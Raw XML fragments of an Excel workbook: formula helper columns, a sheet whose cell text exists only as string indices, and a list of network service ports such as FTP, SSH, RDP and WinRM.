      </c>
      <c r="B585" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C585" s="131" t="str">
        <f>IF(B585=1,COUNTIF($B$53:B585,1),"")</f>
        <v/>
      </c>
      <c r="D585" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C585),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E585" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="586" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A586" s="130" t="s">
        <v>22575</v>
      </c>
      <c r="B586" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C586" s="131" t="str">
        <f>IF(B586=1,COUNTIF($B$53:B586,1),"")</f>
        <v/>
      </c>
      <c r="D586" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C586),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E586" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="587" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A587" s="130" t="s">
        <v>22576</v>
      </c>
      <c r="B587" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C587" s="131" t="str">
        <f>IF(B587=1,COUNTIF($B$53:B587,1),"")</f>
        <v/>
      </c>
      <c r="D587" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C587),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E587" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="588" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A588" s="130" t="s">
        <v>22577</v>
      </c>
      <c r="B588" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C588" s="131" t="str">
        <f>IF(B588=1,COUNTIF($B$53:B588,1),"")</f>
        <v/>
      </c>
      <c r="D588" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C588),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E588" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="589" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A589" s="130" t="s">
        <v>22578</v>
      </c>
      <c r="B589" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C589" s="131" t="str">
        <f>IF(B589=1,COUNTIF($B$53:B589,1),"")</f>
        <v/>
      </c>
      <c r="D589" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C589),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E589" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="590" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A590" s="130" t="s">
        <v>22579</v>
      </c>
      <c r="B590" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C590" s="131" t="str">
        <f>IF(B590=1,COUNTIF($B$53:B590,1),"")</f>
        <v/>
      </c>
      <c r="D590" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C590),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E590" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="591" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A591" s="130" t="s">
        <v>22580</v>
      </c>
      <c r="B591" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C591" s="131" t="str">
        <f>IF(B591=1,COUNTIF($B$53:B591,1),"")</f>
        <v/>
      </c>
      <c r="D591" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C591),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E591" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="592" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A592" s="130" t="s">
        <v>22581</v>
      </c>
      <c r="B592" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C592" s="131" t="str">
        <f>IF(B592=1,COUNTIF($B$53:B592,1),"")</f>
        <v/>
      </c>
      <c r="D592" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C592),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E592" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="593" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A593" s="130" t="s">
        <v>22582</v>
      </c>
      <c r="B593" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C593" s="131" t="str">
        <f>IF(B593=1,COUNTIF($B$53:B593,1),"")</f>
        <v/>
      </c>
      <c r="D593" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C593),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E593" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="594" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A594" s="130" t="s">
        <v>22583</v>
      </c>
      <c r="B594" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C594" s="131" t="str">
        <f>IF(B594=1,COUNTIF($B$53:B594,1),"")</f>
        <v/>
      </c>
      <c r="D594" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C594),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E594" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="595" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A595" s="130" t="s">
        <v>22584</v>
      </c>
      <c r="B595" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C595" s="131" t="str">
        <f>IF(B595=1,COUNTIF($B$53:B595,1),"")</f>
        <v/>
      </c>
      <c r="D595" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C595),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E595" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="596" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A596" s="130" t="s">
        <v>22585</v>
      </c>
      <c r="B596" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C596" s="131" t="str">
        <f>IF(B596=1,COUNTIF($B$53:B596,1),"")</f>
        <v/>
      </c>
      <c r="D596" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C596),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E596" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="597" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A597" s="130" t="s">
        <v>22586</v>
      </c>
      <c r="B597" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C597" s="131" t="str">
        <f>IF(B597=1,COUNTIF($B$53:B597,1),"")</f>
        <v/>
      </c>
      <c r="D597" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C597),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E597" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="598" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A598" s="130" t="s">
        <v>22587</v>
      </c>
      <c r="B598" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C598" s="131" t="str">
        <f>IF(B598=1,COUNTIF($B$53:B598,1),"")</f>
        <v/>
      </c>
      <c r="D598" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C598),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E598" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="599" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A599" s="130" t="s">
        <v>22588</v>
      </c>
      <c r="B599" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C599" s="131" t="str">
        <f>IF(B599=1,COUNTIF($B$53:B599,1),"")</f>
        <v/>
      </c>
      <c r="D599" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C599),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E599" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="600" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A600" s="130" t="s">
        <v>22589</v>
      </c>
      <c r="B600" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C600" s="131" t="str">
        <f>IF(B600=1,COUNTIF($B$53:B600,1),"")</f>
        <v/>
      </c>
      <c r="D600" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C600),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E600" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="601" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A601" s="130" t="s">
        <v>22590</v>
      </c>
      <c r="B601" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C601" s="131" t="str">
        <f>IF(B601=1,COUNTIF($B$53:B601,1),"")</f>
        <v/>
      </c>
      <c r="D601" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C601),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E601" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="602" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A602" s="130" t="s">
        <v>22591</v>
      </c>
      <c r="B602" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C602" s="131" t="str">
        <f>IF(B602=1,COUNTIF($B$53:B602,1),"")</f>
        <v/>
      </c>
      <c r="D602" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C602),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E602" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="603" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A603" s="130" t="s">
        <v>22592</v>
      </c>
      <c r="B603" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C603" s="131" t="str">
        <f>IF(B603=1,COUNTIF($B$53:B603,1),"")</f>
        <v/>
      </c>
      <c r="D603" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C603),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E603" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="604" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A604" s="130" t="s">
        <v>22593</v>
      </c>
      <c r="B604" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C604" s="131" t="str">
        <f>IF(B604=1,COUNTIF($B$53:B604,1),"")</f>
        <v/>
      </c>
      <c r="D604" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C604),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E604" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="605" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A605" s="130" t="s">
        <v>22594</v>
      </c>
      <c r="B605" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C605" s="131" t="str">
        <f>IF(B605=1,COUNTIF($B$53:B605,1),"")</f>
        <v/>
      </c>
      <c r="D605" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C605),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E605" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="606" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A606" s="130" t="s">
        <v>22595</v>
      </c>
      <c r="B606" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C606" s="131" t="str">
        <f>IF(B606=1,COUNTIF($B$53:B606,1),"")</f>
        <v/>
      </c>
      <c r="D606" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C606),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E606" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="607" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A607" s="130" t="s">
        <v>22596</v>
      </c>
      <c r="B607" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C607" s="131" t="str">
        <f>IF(B607=1,COUNTIF($B$53:B607,1),"")</f>
        <v/>
      </c>
      <c r="D607" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C607),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E607" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="608" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A608" s="130" t="s">
        <v>22597</v>
      </c>
      <c r="B608" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C608" s="131" t="str">
        <f>IF(B608=1,COUNTIF($B$53:B608,1),"")</f>
        <v/>
      </c>
      <c r="D608" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C608),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E608" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="609" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A609" s="130" t="s">
        <v>22598</v>
      </c>
      <c r="B609" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C609" s="131" t="str">
        <f>IF(B609=1,COUNTIF($B$53:B609,1),"")</f>
        <v/>
      </c>
      <c r="D609" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C609),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E609" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="610" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A610" s="130" t="s">
        <v>22599</v>
      </c>
      <c r="B610" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C610" s="131" t="str">
        <f>IF(B610=1,COUNTIF($B$53:B610,1),"")</f>
        <v/>
      </c>
      <c r="D610" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C610),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E610" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="611" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A611" s="130" t="s">
        <v>22600</v>
      </c>
      <c r="B611" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C611" s="131" t="str">
        <f>IF(B611=1,COUNTIF($B$53:B611,1),"")</f>
        <v/>
      </c>
      <c r="D611" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C611),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E611" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="612" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A612" s="130" t="s">
        <v>22601</v>
      </c>
      <c r="B612" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C612" s="131" t="str">
        <f>IF(B612=1,COUNTIF($B$53:B612,1),"")</f>
        <v/>
      </c>
      <c r="D612" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C612),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E612" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="613" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A613" s="130" t="s">
        <v>22602</v>
      </c>
      <c r="B613" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C613" s="131" t="str">
        <f>IF(B613=1,COUNTIF($B$53:B613,1),"")</f>
        <v/>
      </c>
      <c r="D613" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C613),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E613" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="614" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A614" s="130" t="s">
        <v>22603</v>
      </c>
      <c r="B614" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C614" s="131" t="str">
        <f>IF(B614=1,COUNTIF($B$53:B614,1),"")</f>
        <v/>
      </c>
      <c r="D614" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C614),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E614" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="615" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A615" s="130" t="s">
        <v>22604</v>
      </c>
      <c r="B615" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C615" s="131" t="str">
        <f>IF(B615=1,COUNTIF($B$53:B615,1),"")</f>
        <v/>
      </c>
      <c r="D615" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C615),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E615" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="616" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A616" s="130" t="s">
        <v>22605</v>
      </c>
      <c r="B616" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C616" s="131" t="str">
        <f>IF(B616=1,COUNTIF($B$53:B616,1),"")</f>
        <v/>
      </c>
      <c r="D616" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C616),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E616" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="617" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A617" s="130" t="s">
        <v>22606</v>
      </c>
      <c r="B617" s="131">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C617" s="131" t="str">
        <f>IF(B617=1,COUNTIF($B$53:B617,1),"")</f>
        <v/>
      </c>
      <c r="D617" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C617),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E617" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="618" spans="1:5" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A618" s="133" t="s">
        <v>22607</v>
      </c>
      <c r="B618" s="134">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="C618" s="134" t="str">
        <f>IF(B618=1,COUNTIF($B$53:B618,1),"")</f>
        <v/>
      </c>
      <c r="D618" s="135" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C618),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E618" s="129" t="s">
        <v>269</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection autoFilter="0"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="Q53:Q104">
    <sortCondition ref="Q53"/>
  </sortState>
  <mergeCells count="5">
    <mergeCell ref="C2:J3"/>
    <mergeCell ref="B22:I23"/>
    <mergeCell ref="I7:N7"/>
    <mergeCell ref="P7:Q7"/>
    <mergeCell ref="B26:I27"/>
  </mergeCells>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait"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C20"/>
  <sheetViews>
    <sheetView zoomScale="70" zoomScaleNormal="70" workbookViewId="0">
      <selection activeCell="B10" sqref="B10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15.75" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="111" style="25" customWidth="1"/>
    <col min="2" max="2" width="212.85546875" style="31" customWidth="1"/>
    <col min="3" max="3" width="71.5703125" style="25" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A1" s="23" t="s">
        <v>22608</v>
      </c>
      <c r="B1" s="39" t="s">
        <v>1236</v>
      </c>
      <c r="C1" s="23" t="s">
        <v>1237</v>
      </c>
    </row>
    <row r="2" spans="1:3" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A2" s="244" t="s">
        <v>22609</v>
      </c>
      <c r="B2" s="40" t="s">
        <v>22610</v>
      </c>
      <c r="C2" s="41"/>
    </row>
    <row r="3" spans="1:3" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A3" s="245"/>
      <c r="B3" s="42" t="s">
        <v>22611</v>
      </c>
      <c r="C3" s="43"/>
    </row>
    <row r="4" spans="1:3" ht="48" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A4" s="245"/>
      <c r="B4" s="44" t="s">
        <v>22612</v>
      </c>
      <c r="C4" s="45"/>
    </row>
    <row r="5" spans="1:3" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A5" s="246" t="s">
        <v>22613</v>
      </c>
      <c r="B5" s="48" t="s">
        <v>22614</v>
      </c>
      <c r="C5" s="49"/>
    </row>
    <row r="6" spans="1:3" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A6" s="247"/>
      <c r="B6" s="50" t="s">
        <v>22615</v>
      </c>
      <c r="C6" s="51"/>
    </row>
    <row r="7" spans="1:3" ht="48" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A7" s="248"/>
      <c r="B7" s="52" t="s">
        <v>22616</v>
      </c>
      <c r="C7" s="53"/>
    </row>
    <row r="8" spans="1:3" ht="63" x14ac:dyDescent="0.25">
      <c r="A8" s="26" t="s">
        <v>22617</v>
      </c>
      <c r="B8" s="46" t="s">
        <v>22618</v>
      </c>
      <c r="C8" s="47"/>
    </row>
    <row r="9" spans="1:3" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A9" s="26"/>
      <c r="B9" s="24" t="s">
        <v>22619</v>
      </c>
      <c r="C9" s="32"/>
    </row>
    <row r="10" spans="1:3" ht="189" x14ac:dyDescent="0.25">
      <c r="A10" s="26"/>
      <c r="B10" s="24" t="s">
        <v>22620</v>
      </c>
      <c r="C10" s="32"/>
    </row>
    <row r="11" spans="1:3" ht="63" x14ac:dyDescent="0.25">
      <c r="A11" s="26"/>
      <c r="B11" s="58" t="s">
        <v>22621</v>
      </c>
      <c r="C11" s="59"/>
    </row>
    <row r="12" spans="1:3" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A12" s="26"/>
      <c r="B12" s="58" t="s">
        <v>22622</v>
      </c>
      <c r="C12" s="59"/>
    </row>
    <row r="13" spans="1:3" ht="32.25" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A13" s="26"/>
      <c r="B13" s="58" t="s">
        <v>22623</v>
      </c>
      <c r="C13" s="59"/>
    </row>
    <row r="14" spans="1:3" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A14" s="268" t="s">
        <v>22624</v>
      </c>
      <c r="B14" s="62" t="s">
        <v>22625</v>
      </c>
      <c r="C14" s="63"/>
    </row>
    <row r="15" spans="1:3" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A15" s="269"/>
      <c r="B15" s="67" t="s">
        <v>22626</v>
      </c>
      <c r="C15" s="66"/>
    </row>
    <row r="16" spans="1:3" ht="126" x14ac:dyDescent="0.25">
      <c r="A16" s="269"/>
      <c r="B16" s="67" t="s">
        <v>22627</v>
      </c>
      <c r="C16" s="66"/>
    </row>
    <row r="17" spans="1:3" ht="32.25" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A17" s="270"/>
      <c r="B17" s="64" t="s">
        <v>22628</v>
      </c>
      <c r="C17" s="65"/>
    </row>
    <row r="18" spans="1:3" ht="63" x14ac:dyDescent="0.25">
      <c r="A18" s="227" t="s">
        <v>22629</v>
      </c>
      <c r="B18" s="60" t="s">
        <v>22630</v>
      </c>
      <c r="C18" s="61"/>
    </row>
    <row r="19" spans="1:3" ht="63" x14ac:dyDescent="0.25">
      <c r="A19" s="228"/>
      <c r="B19" s="33" t="s">
        <v>22631</v>
      </c>
      <c r="C19" s="36"/>
    </row>
    <row r="20" spans="1:3" ht="79.5" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A20" s="229"/>
      <c r="B20" s="37" t="s">
        <v>22632</v>
      </c>
      <c r="C20" s="38"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A2:A4"/>
    <mergeCell ref="A5:A7"/>
    <mergeCell ref="A18:A20"/>
    <mergeCell ref="A14:A17"/>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dimension ref="A1:E42"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="I25" sqref="I25"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="31.85546875" customWidth="1"/>
    <col min="2" max="2" width="37.140625" customWidth="1"/>
    <col min="3" max="3" width="18.42578125" customWidth="1"/>
    <col min="4" max="4" width="20.28515625" customWidth="1"/>
    <col min="5" max="5" width="17.42578125" customWidth="1"/>
    <col min="9" max="9" width="25.7109375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1" s="27" t="s">
        <v>22633</v>
      </c>
      <c r="B1" s="27" t="s">
        <v>22634</v>
      </c>
      <c r="C1" s="30"/>
      <c r="E1" s="22" t="s">
        <v>22635</v>
      </c>
    </row>
    <row r="2" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2" s="27" t="s">
        <v>391</v>
      </c>
      <c r="B2" s="27" t="s">
        <v>741</v>
      </c>
      <c r="C2" s="30"/>
    </row>
    <row r="3" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3" s="27" t="s">
        <v>22636</v>
      </c>
      <c r="B3" s="27" t="s">
        <v>22637</v>
      </c>
      <c r="C3" s="30"/>
      <c r="E3" t="str">
        <f t="array" aca="1" ref="E3" ca="1">INDIRECT("A1")</f>
        <v>21 - FTP</v>
      </c>
    </row>
    <row r="4" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4" s="27" t="s">
        <v>22638</v>
      </c>
      <c r="B4" s="57" t="s">
        <v>22639</v>
      </c>
      <c r="C4" s="30"/>
      <c r="E4" t="str">
        <f t="array" aca="1" ref="E4" ca="1">INDIRECT("B1")</f>
        <v>3306 - MySQL</v>
      </c>
    </row>
    <row r="5" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5" s="27" t="s">
        <v>54</v>
      </c>
      <c r="B5" s="57" t="s">
        <v>22640</v>
      </c>
      <c r="C5" s="30"/>
      <c r="E5" t="str">
        <f t="array" aca="1" ref="E5" ca="1">INDIRECT("A2")</f>
        <v>22 - SSH</v>
      </c>
    </row>
    <row r="6" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6" s="27" t="s">
        <v>22641</v>
      </c>
      <c r="B6" s="27" t="s">
        <v>22642</v>
      </c>
      <c r="C6" s="30"/>
      <c r="E6" t="str">
        <f t="array" aca="1" ref="E6" ca="1">INDIRECT("B2")</f>
        <v>3389 - RDP</v>
      </c>
    </row>
    <row r="7" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7" s="27" t="s">
        <v>22643</v>
      </c>
      <c r="B7" s="27" t="s">
        <v>22644</v>
      </c>
      <c r="C7" s="30"/>
      <c r="E7" t="str">
        <f t="array" aca="1" ref="E7" ca="1">INDIRECT("A3")</f>
        <v>23 - Telnet</v>
      </c>
    </row>
    <row r="8" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8" s="27" t="s">
        <v>22645</v>
      </c>
      <c r="B8" s="27" t="s">
        <v>22646</v>
      </c>
      <c r="C8" s="30"/>
      <c r="E8" t="str">
        <f t="array" aca="1" ref="E8" ca="1">INDIRECT("B3")</f>
        <v>5800 / 5900 - VNC</v>
      </c>
    </row>
    <row r="9" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9" s="27" t="s">
        <v>22647</v>
      </c>
      <c r="B9" s="27" t="s">
        <v>22648</v>
      </c>
      <c r="C9" s="30"/>
      <c r="E9" t="str">
        <f t="array" aca="1" ref="E9" ca="1">INDIRECT("A4")</f>
        <v>25 - SMTP</v>
      </c>
    </row>
    <row r="10" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A10" s="27" t="s">
        <v>81</v>
      </c>
      <c r="B10" s="27" t="s">
        <v>22649</v>
      </c>
      <c r="C10" s="30"/>
      <c r="E10" t="str">
        <f t="array" aca="1" ref="E10" ca="1">INDIRECT("B4")</f>
        <v>5985 / 47001 - WinRM</v>
      </c>
    </row>
    <row r="11" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A11" s="27" t="s">
        <v>22650</v>
      </c>
      <c r="B11" s="27" t="s">
        <v>22651</v>
      </c>
      <c r="C11" s="30"/>
      <c r="E11" t="str">
        <f t="array" aca="1" ref="E11" ca="1">INDIRECT("A5")</f>
        <v>53 - DNS</v>
      </c>
    </row>
    <row r="12" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A12" s="27" t="s">
        <v>22652</v>
      </c>
      <c r="B12" s="27" t="s">
